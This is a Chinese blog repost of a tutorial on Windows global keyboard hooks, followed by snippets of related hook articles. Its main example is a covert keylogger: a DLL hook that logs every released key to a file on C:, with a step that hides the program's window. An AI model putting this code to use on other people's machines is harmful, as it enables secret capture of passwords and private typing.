系统钩子的一个简单例子

最新推荐文章于 2020-10-26 17:59:05 发布
最新推荐文章于 2020-10-26 17:59:05 发布
阅读量250 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: MFC C C++ C# Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/happy570/article/details/83486482
本文介绍如何利用系统钩子和动态链接库(DLL)监控全局键盘输入。通过设置WH_KEYBOARD类型的钩子,可以在任意窗口捕获键盘事件,并将记录的数据保存到文件中。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

http://hi.baidu.com/kayvcai/blog/item/b5253aec3838e6d22e2e216a.html
系统钩子的一个简单例子
2007-12-01 14:53
系统钩子和DLL
   钩子的本质是一段用以处理系统消息的程序,通过系统调用,将其挂入系统。钩子的种类有很多,每种钩子可以截获并处理相应的消息,每当特定的消息发出,在到达目的窗口之前,钩子程序先行截获该消息、得到对此消息的控制权。此时在钩子函数中就可以对截获的消息进行加工处理,甚至可以强制结束消息的传递。
在本程序中我们需要捕获在任意窗口上的键盘输入,这就需要采用全局钩子以便拦截整个系统的消息,而全局钩子函数必须以DLL(动态连接库)为载体进行封装,VC6中有三种形式的MFC DLL可供选择,即Regular statically linked to MFC DLL(标准静态链接MFC DLL)、Regular using the shared MFC DLL(标准动态链接MFC DLL)以及Extension MFC DLL(扩展MFC DLL)。 在本程序中为方便起见采用了标准静态连接MFC DLL。
   三、键盘钩子程序示例
   本示例程序用到全局钩子函数,程序分两部分:可执行程序KeyHook和动态连接库LaunchDLL。
   1、首先编制MFC扩展动态连接库LaunchDLL.dll:
   (1)选择MFC AppWizard(DLL)创建项目LaunchDLL;在接下来的选项中选择Regular statically linked to MFC DLL(标准静态链接MFC DLL)。
   (2)在LaunchDLL.h中添加宏定义和待导出函数的声明:
   #define DllExport __declspec(dllexport)
   ……
   DllExport void WINAPI InstallLaunchEv();
   ……
   class CLaunchDLLApp : public CWinApp
   {
   public:
   CLaunchDLLApp();

   //{{AFX_VIRTUAL(CLaunchDLLApp)
   //}}AFX_VIRTUAL

   //{{AFX_MSG(CLaunchDLLApp)
   // NOTE - the ClassWizard will add and remove member functions here.
   // DO NOT EDIT what you see in these blocks of generated code !
   //}}AFX_MSG
   DECLARE_MESSAGE_MAP()
   };
(3)在LaunchDLL.cpp中添加全局变量Hook和全局函数LauncherHook、SaveLog:
   HHOOK Hook;
   LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam);
   void SaveLog(char* c);
(4)完成以上提到的这几个函数的实现部分:
   ……
   CLaunchDLLApp theApp;
   ……
   DllExport void WINAPI InstallLaunchEv()
   {
   Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,
   (HOOKPROC)LauncherHook,
   theApp.m_hInstance,
   0);
   }
在此我们实现了Windows的系统钩子的安装,首先要调用SDK中的API函数SetWindowsHookEx来安装这个钩子函数,其原型是:
   HHOOK SetWindowsHookEx(int idHook,
   HOOKPROC lpfn,
   HINSTANCE hMod,
   DWORD dwThreadId);
   其中,第一个参数指定钩子的类型,常用的有WH_MOUSE、WH_KEYBOARD、WH_GETMESSAGE等,在此我们只关心键盘操作所以设定为WH_KEYBOARD;第二个参数标识钩子函数的入口地址,当钩子钩到任何消息后便调用这个函数,即当不管系统的哪个窗口有键盘输入马上会引起LauncherHook的动作;第三个参数是钩子函数所在模块的句柄,我们可以很简单的设定其为本应用程序的实例句柄;最后一个参数是钩子相关函数的ID用以指定想让钩子去钩哪个线程,为0时则拦截整个系统的消息,在本程序中钩子需要为全局钩子,故设定为0。
   ……
   LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
   {
   LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam);
   if(nCode==HC_ACTION)
   {
   if(lParam & 0x80000000)
   {
   char c[1];
   c[0]=wParam;
   SaveLog(c);
   }
   }
   return Result;
   }
   虽然调用CallNextHookEx()是可选的,但调用此函数的习惯是很值得推荐的;否则的话,其他安装了钩子的应用程序将不会接收到钩子的通知而且还有可能产生不正确的结果,所以我们应尽量调用该函数除非绝对需要阻止其他程序获取通知。
   ……
   void SaveLog(char* c)
   {
   CTime tm=CTime::GetCurrentTime();
   CString name;
   name.Format("c:\\Key_%d_%d.log",tm.GetMonth(),tm.GetDay());
   CFile file;
   if(!file.Open(name,CFile::modeReadWrite))
   {
   file.Open(name,CFile::modeCreate|CFile::modeReadWrite);
   }
   file.SeekToEnd();
   file.Write(c,1);
   file.Close();
   }
   当有键弹起的时候就通过此函数将刚弹起的键保存到记录文件中从而实现对键盘进行监控记录的目的。
   编译完成便可得到运行时所需的键盘钩子的动态连接库LaunchDLL.dll和进行静态链接时用到的LaunchDLL.lib。
   2、下面开始编写调用此动态连接库的主程序,并实现最后的集成:
   (1)用MFC的AppWizard(EXE)创建项目KeyHook;
   (2)选择单文档,其余几步可均为确省;
   (3)把LaunchDLL.h和LaunchDLL.lib复制到KeyHook工程目录中,LaunchDLL.dll复制到Debug目录下。
   (4)链接DLL库,即在"Project","Settings…"的"Link"属性页内,在"Object/librarymodules:"中填 入"LaunchDLL.lib"。再通过"Project","Add To Project","Files…"将LaunchDLL.h添加到工程中来,最后在视类的源文件KeyHook.cpp中加入对其的引用:
   #include "LaunchDLL.h"
   这样我们就可以象使用本工程内的 函数一样使用动态连接库LaunchDLL.dll中的所有导出函数了。
(5)在视类中添加虚函数OnInitialUpdate(),并添加代码完成对键盘钩子的安装:
   ……
   InstallLaunchEv();
   ……
(6)到此为止其实已经完成了所有的功能,但作为一个后台监控软件,运行时并不希望有界面,可以在应用程序类CkeyHookApp的InitInstance()函数中将m_pMainWnd->ShowWindow(SW_SHOW);改为m_pMainWnd->ShowWindow (SW_HIDE);即可。
   四、运行与检测
   编译运行程序,运行起来之后并无什么现象,但通过Alt+Ctrl+Del在关闭程序对话框内可以找到我们刚编写完毕的程序"KeyHook",随便在什么程序中通过键盘输入字符,然后打开记录文件,我们会发现:通过键盘钩子,我们刚才输入的字符都被记录到记录文件中了。
   小结:系统钩子具有相当强大的功能,通过这种技术可以对几乎所有的Windows系统消息进行拦截、监视、处理。这种技术广泛应用于各种自动监控系统中
happy570
关注
消息钩子函数入门篇
raphyer的专栏
10-02 8246
Windows系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实现的。而钩子Windows系统中非常重要的系统接口,用它可以截获并处理送给其他应用程序的消息,来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的钩子,监视系统中特定事件的发生,完成特定的功能,比如截获键盘、鼠标的输入,
钩子编程例子
06-25
Windows窗体(Form,形状/表单)原来是Visual Basic程序的用户界面,后来成为.NET程序的GUI,被Visual Studio中的C#、Visual Basic、F#、MC++C++/CLI等开发语言工具所使用,后来又从Visual C++ 2005起被引入到MFC编程中
钩子简单例子
LongtengGensSupreme博客
11-17 752
界面 后台代码 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Runtime.InteropServi
系统钩子的编程实例
小虎的空间
03-27 471
系统钩子的编程实例: 由于系统钩子要用到dll,所以先介绍下win32 dll的特点: Win32 DLL与 Win16 DLL有很大的区别 这主要是由操作系统的设计思想决定的。一方面,在Win16 DLL中程序入口点函数和出口点函数(LibMain和WEP)是分别实现的;而在Win32 DLL中却由同一函数DLLMain来实现。无论何时,当一个进程或线程载入和卸载DLL时,都要调用该函数,它的原
hook钩子简单实例
11-10
hook钩子简单实例 hook钩子简单实例 hook钩子简单实例 hook钩子简单实例
VC全局钩子系统钩子例子.rar
12-27
下面是一个简单的全局键盘钩子例子: ```c #include LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { // 处理键盘事件的代码 if (nCode ) return CallNextHookEx(NULL, ...
apihook钩子程序例子简单的实现过程,学习用.zip
03-28
API Hook是一种技术,它允许程序员拦截系统调用或者特定函数的调用,以便在调用原函数之前或之后执行自定义代码。这个技术在很多场景下都非常有用,比如调试、日志记录、性能分析,甚至是恶意软件中用来隐藏自身行为...
一个简单的Dx挂钩实例采用VMTHook.zip
最新发布
11-27
在计算机编程和游戏开发领域,DirectX是一个非常重要的技术组件,它是由微软公司开发的一系列应用程序接口(APIs),专门用于处理任务,如视频渲染、音频播放和输入设备,主要应用于Windows操作系统的多媒体应用程序...
掌握全局钩子技术的最简单实例分析
从给定文件信息中提到的标题“最简单的实例_全局钩子”和描述“非常简单例子,除了全局钩子相关代码,不含任何其他内容”,可以推断出这个文件可能包含了一个非常基础的全局钩子代码示例。这个代码示例可能仅用于...
c# Wpf简单键盘钩子实例
04-01
本文将深入探讨如何在WPF项目中实现一个简单的键盘钩子实例。 首先,键盘钩子是一种系统级的机制,允许应用程序在其他进程的上下文中捕获键盘事件。在C#中,我们可以使用`System.Windows.Forms`命名空间中的`...
钩子函数的使用,有例子
09-14
三:程序的设计: I:设置钩子 设置钩子是通过SetWindowsHookEx ()的API函数. 原形: HHOOK SetWindowsHookEx(int idHook,HOOKPROC lpfn,HINSTANCE hMod,DWORD dwThreadId) idhook:装入钩子的类型. lpfn: 钩子进程的入口地址 hMod: 应用程序的事件句柄 dwThreadId: 装入钩子的线程标示 参数: idHook: 这个参数可以是以下值: WH_CALLWNDPROC、WH_CALLWNDPROCRET、WH_CBT、WH_DEBUG、WH_FOREGROUNDIDLE、WH_GETMESSAGE、WH_JOURNALPLAYBACK、WH_JOURNALRECORD、WH_KEYBOARD、 WH_KEYBOARD_LL、WH_MOUSE、WH_MOUSE_LL、WH_MSGFILTER、WH_SHELL、WH_SYSMSGFILTER。 对于这些参数,我不想一一加以解释,因为MSDN中有关于他们的详细注解。我只挑选其中的几个加以中文说明。 WH_KEYBOARD:一旦有键盘敲打消息(键盘的按下、键盘的弹起),在这个消息被放在应用程序的消息队列前,WINDOWS将会调用你的钩子函数。钩子函数可以 改变和丢弃键盘敲打消息。 WH_MOUSE:每个鼠标消息在被放在应用程序的消息队列前,WINDOWS将会调用你的钩子函数。钩子函数可以改变和丢弃鼠标消息。 WH_GETMESSAGE:每次当你的应用程序调用一个GetMessage()或者一个PeekMessage()为了去从应用程序的消息队列中要求一个消息时,WINDOWS都会调用你的钩子函数。 而钩子函数可以改变和丢弃这个消息。 II:释放钩子 钩子的释放使用的是UnhookWindowsHookEx()函数 原形:BOOL UnhookWindowsHookEx( HHOOK hhk ) UnhookWindowsHookEx()函数将释放的是钩子链中函数SetWindowsHookEx所装入的钩子进程。 hhk: 将要释放的钩子进程的句柄。 III:钩子进程 钩子进程使用函数HookProc;其实HookProc仅仅只是应用程序定义的符号。比如你可以写成KeyBoardHook.但是参数是不变的。Win32 API提供了诸如:CallWndProc、 GetMsgProc、DebugProc、CBTProc、MouseProc、KeyboardProc、MessageProc等函数,对于他们的详细讲解,可以看MSDN我在此只讲解一下KeyBoardHook的含义。 原形:LRESULT CALLBACK KeyBoardHook (int nCode, WPARAM wParam, LPARAM lParam) 说明:钩子进程是一些依附在一个钩子上的一些函数,因此钩子进程只被WINDOWS调用而不被应用程序调用,他们有时就需要作为一个回调函数(CALLBACK)。 参数说明: nCode:钩子代码,钩子进程使用钩子代码去决定是否执行。而钩子代码的值是依靠钩子的种类来定的。每种钩子种类都有他们自己一系列特性的代码。比如对于WH_KEYBOARD, 钩子代码的参数有:HC_ACTION,HC_NOREMOVE。HC_ACTION的意义:参数wParam 和lParam 包含了键盘敲打消息的信息,HC_NOREMOVE的意义:参数wParam 和lParam包含了 键盘敲打消息的信息,并且,键盘敲打消息一直没有从消息队列中删除。(应用程序调用PeekMessage函数,并且设置PM_NOREMOVE标志)。也就是说当nCode等于HC_ACTION时, 钩子进程必须处理消息。而为HC_NOREMOVE时,钩子进程必须传递消息给CallNextHookEx函数,而不能做进一步的处理,而且必须有CallNextHookEx函数的返回值。 wParam:键盘敲打所产生的键盘消息,键盘按键的虚拟代码。 lParam:包含了消息细节。 注意:如果钩子进程中nCode小于零,钩子进程必须返回(return) CallNextHookEx(nCode,wParam,lParam);而钩子进程中的nCode大于零,但是钩子进程并不处理消息, 作者推荐你调用CallNextHookEx并且返回该函数的返回值。否则,如果另一个应用程序也装入WH_KEYBOARD 钩子,那么该钩子将不接受钩子通知并且返回一个不正确的值。 如果钩子进程处理了消息,它可能返回一个非零值去阻止系统传递该信息到其它剩下的钩子或者windows进程。所以最好在钩子进程的最后都返回CallNextHookEx的返回
C++完美版钩子的使用实例
11-10
C++ 消息拦截技术钩子的完美实例,欢迎大家使用
系统钩子大全,详细演示如何实现各种系统钩子
10-14
详细演示如何实现各种系统钩子,包括: 1.CopyHook 2.HookKey 3.MessageHook 4.MouseHook 5.不用DLL的KeyHook 6.钩子实现文件或端口读写的截取 7.鼠标键盘记录和回放
实例讲解Ruby中的钩子方法及对方法调用添加钩子
01-03
钩子方法有些类似事件驱动装置,可以在特定的事件发生后执行特定的回调函数,这个回调函数就是钩子方法(更形象的描述: 钩子方法可以像钩子一样,勾住一个特定的事件。),在Rails中before\after函数就是最常见的钩子方法。 Class#inherited方法也是这样一个钩子方法,当一个类被继承时,Ruby会调用该方法。默认情况下,Class#inherited什么都不做,但是通过继承,我们可以拦截该事件,对感兴趣的继承事件作出回应。 class String def self.inherited(subclass) puts “#{self} was inherited by
系统钩子和DLL
快乐天堂
10-29 1346
钩子的本质是一段用以处理系统消息的程序,通过系统调用,将其挂入系统钩子的种类有很多,每种钩子可以截获并处理相应的消息,每当特定的消息发出,在到达目的窗口之前,钩子程序先行截获该消息、得到对此消息的控制权。此时在钩子函数中就可以对截获的消息进行加工处理,甚至可以强制结束消息的传递。 在本程序中我们需要捕获在任意窗口上的键盘输入,这就需要采用全局钩子以便拦截整个系统的消息,而全局钩子函数必须以D
SystemParametersInfo详说
12-11 757
Windows系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实现的。而钩子Windows系统中非常重要的系统接口,用它可以截获并处理送给其他应用程序的消息,来完成普通应用程序难以实现的功能。钩子可以监视系统或进程中的各种事件消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的钩子,监视系统中特定事件的发生,完成特定的功能,比如截获键盘、鼠标
钩子函数简单示例
Tiaobaobao的博客
09-20 1809
关于钩子函数的概念,百科有更详细的注释。 我个人的理解是,任何消息,系统都会有对应的机制或者说函数来处理,钩子函数的意义在于,可以在系统处理之前,先拿到这个具体的消息,然后做出自己的处理,接下来可以选择将消息传给其它钩子函数,或者系统,或者截断消息的传递。 不得不说,由于平台和环境的差异,很多例子根本跑不通,我这个基于VS/C++,基本的鼠标和键盘钩子,就当给自己做个记录吧 1.封装...
钩子函数简析及实例
weixin_39461846的博客
10-26 680
钩子函数、回调函数、注册函数,挂钩子这些我们代码中经常涉及到的东西,是否已经困扰你很久了?它们究竟是怎么回事,究竟怎么用?下面我来为你一一解答。 什么是钩子函数? 钩子函数也叫回调函数,是通过函数指针来实现的,那我们来看看什么是函数指针。 首先看看以下例子: int *p; int a,b; 我们可以让指针p先后指向a, b,这样,p就先后代表了不同变量的地址 p = &a; p = &b; 同样地,函数的指针可以指向不同的函数,从而完成不同的功能。 例如,定义函数指..
主题:钩子函数简析及实例
countofdane的博客
10-17 601
if(x        return x;     else        return y; } 因为应用模块无法修改平台的代码,只能调用平台提供的注册函数: 如果应用模块注册:  RegFun(Max); 则运行 main 函数时,输出:15 如果应用模块注册: RegFun(Min) 运行 main 函数时,输出:10
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值